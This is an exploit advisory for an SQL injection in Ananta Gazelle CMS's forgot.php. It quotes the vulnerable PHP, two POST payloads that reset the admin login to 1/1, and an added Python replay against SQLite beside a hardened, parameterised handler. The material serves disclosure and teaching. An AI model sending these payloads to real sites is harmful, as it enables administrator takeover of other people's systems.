Vendor: Gazelle CMS
By: hackme
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Gazelle CMS
Affected Version From: 1.0 stable
Affected Version To: 1.0 stable
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: backbox 2.1
2012

Ananta Gazelle CMS – Update Statement Sql injection

This SQL injection lets an attacker overwrite the username and password of the admin user in Ananta Gazelle CMS. The flaw is in 'forgot.php', which handles the form that sets a new activation key for an account. The handler builds an UPDATE statement by concatenating the POST parameters 'table', 'activate' and 'email' straight into the query string, so the attacker controls the table name and everything that follows it, and can cut off the rest of the intended statement with an SQL comment. Because quote characters such as the apostrophe cannot be entered, arbitrary strings cannot be written; instead the exploit copies the value of the 'active' column (1 on the admin row) into 'name', and md5(active), i.e. md5('1'), into 'pass', for the user row with number=1. The attacker can then log in as username '1' with password '1' and has administrative access to the CMS.

Mitigation:

The table name must not come from the request at all: forgot.php should update a fixed table (or one chosen from a server-side allowlist), since SQL identifiers such as table names cannot be bound as query parameters. The 'activate' and 'email' values should be bound as parameters of a prepared statement rather than concatenated into the query, which also means replacing the legacy mysql_* functions, which offer no parameter binding, with mysqli or PDO prepared statements. Input validation on 'email' (a syntactically valid address) and 'activate' (the expected key format) is a useful second layer but is not a substitute for the two fixes above.

Exploit-DB raw data:

# Exploit Title: Ananta Gazelle CMS - Update Statement Sql injection
# Google Dork: -
# Date: 07-02-2012
# Author: hackme
# Software Link: http://sourceforge.net/projects/ananta/files/stable/Gazelle 1.0 stable/Ananta_Gazelle1.0.zip/
# Version: 1.0 stable
# Tested on: backbox 2.1
# CVE : -

[SORRY FOR MY BAD ENGLISH]

[+] This SQL injection does not let us read the contents of the tables, but it does let us run an UPDATE on the admin's username and password.
Since special characters such as the apostrophe cannot be entered, we cannot set the username and password to whatever we want; instead we copy the value of a column that has a known default into the username and password columns.
The result is:
	
	admin - username = 1
	      - password = 1

[+] Vulnerable Code (forgot.php):
[code]
if (!empty($_POST) && !isset($_POST["loginform"])) {
	// form submitted, set a new activation key for this user (however don't set the user to inactive, so no-one can block someone else's account)
	// the table name is taken verbatim from the request: $_POST["table"] is never checked against a known table
	$sql = "UPDATE ".$tableprefix.$_POST["table"]." SET ";
	
	if ($_POST["activate"] <> "") {
		// activation key concatenated into the query without escaping
		$sql = $sql."activate='".$_POST["activate"]."'";
	}
	
	// e-mail address concatenated into the WHERE clause without escaping
	$sql = $sql." WHERE email"."='".$_POST["email"]."'";
	//no control 
	if (mysql_query($sql)) {
[/code]
[+] Default 'users' table columns: number, name, pass, email, activate, active, admin, joindate, showemail
[+] Risk: High
[+] Vuln Page: www.site.it/ananta/forgot.php

[+] Change the admin username to "1" [POST-DATA]
email=&save=Save&table=users SET name=active where number=1--&activate=lol&location=/ananta/forgot.php

Resulting statement: UPDATE $tableprefixusers SET name=active where number=1-- SET activate='lol' WHERE email=''
(everything after "--" is a comment; the row with number=1 gets its name set to the value of its active column, which is 1)

[+] Change the admin password to "1" [POST-DATA]
email=v&save=Save&table=users SET pass=md5(active) where number=1--&activate=lol&location=/ananta/forgot.php

Resulting statement: UPDATE $tableprefixusers SET pass=md5(active) where number=1-- SET activate='lol' WHERE email='v'
(pass becomes md5('1'), so the stored hash now matches the password "1")

[+]...If You Really Want Something, You Can Have It...

[+] Greetz To: MZ
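The two POST bodies from the advisory, replayed through the same string concatenation as forgot.php, as an added example that is neither Gazelle CMS code nor part of the advisory: the handler's query building is mirrored in Python, the statements are run against an in-memory SQLite copy of the default users table filled with constructed rows, and a hardened handler of the kind the Mitigation section describes (table chosen server-side, values bound as parameters) is shown beside it. Assumptions: a table prefix of "gz_", the sample rows, and SQLite standing in for MySQL (SQLite has no md5(), so one is registered; the "--" comment works the same way because the handler's own " SET " supplies the whitespace MySQL requires after "--").

```python
"""Added example (not Gazelle CMS code): mirror the forgot.php UPDATE
concatenation, run the advisory's two payloads against an in-memory
SQLite copy of the users table, then show a hardened handler.

Assumptions: table prefix "gz_", the constructed sample rows below, and
SQLite in place of MySQL (SQLite lacks md5(), so one is registered).
"""
import hashlib
import sqlite3

TABLE_PREFIX = "gz_"           # assumed $tableprefix; any value works
ALLOWED_TABLES = {"users"}     # server-side choice for the hardened version

# Field values from the advisory's two POST bodies (URL-decoded).
PAYLOAD_USERNAME = {"email": "", "table": "users SET name=active where number=1--", "activate": "lol"}
PAYLOAD_PASSWORD = {"email": "v", "table": "users SET pass=md5(active) where number=1--", "activate": "lol"}

ORIGINAL_ADMIN_HASH = hashlib.md5(b"s3cret").hexdigest()   # constructed admin hash
MD5_OF_1 = hashlib.md5(b"1").hexdigest()                    # what md5(active) yields when active=1


def vulnerable_sql(post):
    """Build the statement exactly as forgot.php concatenates it.
    The table name and both values are spliced in unescaped; the " SET "
    appended after the table name is what gives the "--" comment the
    trailing whitespace MySQL requires."""
    sql = "UPDATE " + TABLE_PREFIX + post["table"] + " SET "
    if post["activate"] != "":
        sql += "activate='" + post["activate"] + "'"
    sql += " WHERE email='" + post["email"] + "'"
    return sql


def fresh_db():
    """In-memory stand-in for the default users table with constructed rows;
    row number=1 is the administrator, as the advisory assumes."""
    db = sqlite3.connect(":memory:")
    db.create_function("md5", 1, lambda v: hashlib.md5(str(v).encode()).hexdigest())
    db.execute("CREATE TABLE gz_users (number INTEGER PRIMARY KEY, name TEXT, pass TEXT,"
               " email TEXT, activate TEXT, active INTEGER, admin INTEGER)")
    db.execute("INSERT INTO gz_users VALUES (1, 'admin', ?, 'admin@site.it', '', 1, 1)",
               (ORIGINAL_ADMIN_HASH,))
    db.execute("INSERT INTO gz_users VALUES (2, 'alice', 'x', 'alice@site.it', '', 1, 0)")
    return db


def admin_credentials(db):
    """(name, pass) of the row with number=1."""
    return db.execute("SELECT name, pass FROM gz_users WHERE number=1").fetchone()


def run_vulnerable(*posts):
    """Send each payload through the vulnerable concatenation and return the
    admin's (name, pass) afterwards. Each call is one statement, as with
    mysql_query(); the injected '--' discards the handler's own SET/WHERE."""
    db = fresh_db()
    for post in posts:
        db.execute(vulnerable_sql(post))
    return admin_credentials(db)


def run_hardened(post):
    """Hardened handler: the table name comes from an allowlist, never from
    the request body, and the two user-supplied values are bound as
    parameters. Returns (accepted, rows_changed, admin (name, pass))."""
    db = fresh_db()
    table = post.get("table", "users")
    if table not in ALLOWED_TABLES:          # identifiers cannot be bound, so allowlist them
        return (False, 0, admin_credentials(db))
    cur = db.execute("UPDATE " + TABLE_PREFIX + table + " SET activate=? WHERE email=?",
                     (post["activate"], post["email"]))
    return (True, cur.rowcount, admin_credentials(db))


if __name__ == "__main__":
    print(vulnerable_sql(PAYLOAD_USERNAME))
    print(run_vulnerable(PAYLOAD_USERNAME, PAYLOAD_PASSWORD))   # ('1', md5('1'))
    print(run_hardened(PAYLOAD_PASSWORD))                        # (False, 0, ('admin', ...))
```

Running the file prints the expanded first statement and the admin's credentials after both payloads: name '1' and pass equal to md5('1'), which is exactly what a login of 1/1 checks against. The hardened handler rejects the payloads because "users SET ..." is not an allowed table name, and with the table fixed to users the 'email' and 'activate' values can only ever land in the bound parameter slots.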